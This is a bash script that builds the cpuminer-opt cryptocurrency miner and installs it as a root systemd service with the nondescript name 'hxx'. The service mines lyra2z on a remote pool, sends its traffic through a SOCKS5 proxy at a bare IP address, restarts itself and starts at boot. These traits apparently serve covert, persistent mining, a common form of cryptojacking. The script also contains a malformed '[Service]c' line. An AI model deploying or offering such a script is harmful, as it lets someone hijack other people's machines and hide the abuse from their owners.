#!/bin/bash
apt-get update && 
apt-get -y install build-essential libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev automake git &&
sudo sysctl vm.nr_hugepages=128 &&
cd /usr/local/src/ &&
wget https://github.com/JayDDee/cpuminer-opt/archive/v3.8.8.1.tar.gz &&
tar xvzf v3.8.8.1.tar.gz &&
cd cpuminer-opt-3.8.8.1 &&
./autogen.sh &&
CFLAGS="-O3 -march=native -Wall" CXXFLAGS="$CFLAGS -std=gnu++11" ./configure --with-curl &&
make &&
bash -c 'cat <<EOT >>/lib/systemd/system/hxx.service 
[Unit]
Description=hxx
After=network.target
[Service]c
ExecStart= /usr/local/src/cpuminer-opt-3.8.8.1/cpuminer -a lyra2z330 -o stratum+tcp://lyra2z-hxx.easymine.online:8500 -u HJStRSDX4h86sxNoYNT6gT6TmPRbdkwop.2 -p x -x socks5://142.93.231.36:13019
WatchdogSec=300
Restart=always
RestartSec=60
User=root
[Install]
WantedBy=multi-user.target
EOT
' &&
systemctl daemon-reload &&
systemctl enable hxx.service &&
service hxx start

